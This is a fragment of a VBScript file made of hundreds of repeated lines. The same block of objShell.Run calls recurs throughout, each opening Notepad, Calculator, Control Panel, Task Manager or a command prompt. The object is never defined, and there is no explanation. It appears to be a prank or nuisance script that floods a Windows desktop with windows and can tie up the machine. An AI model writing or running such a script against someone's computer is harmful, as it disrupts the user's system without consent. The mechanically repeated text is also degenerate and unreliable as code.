objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
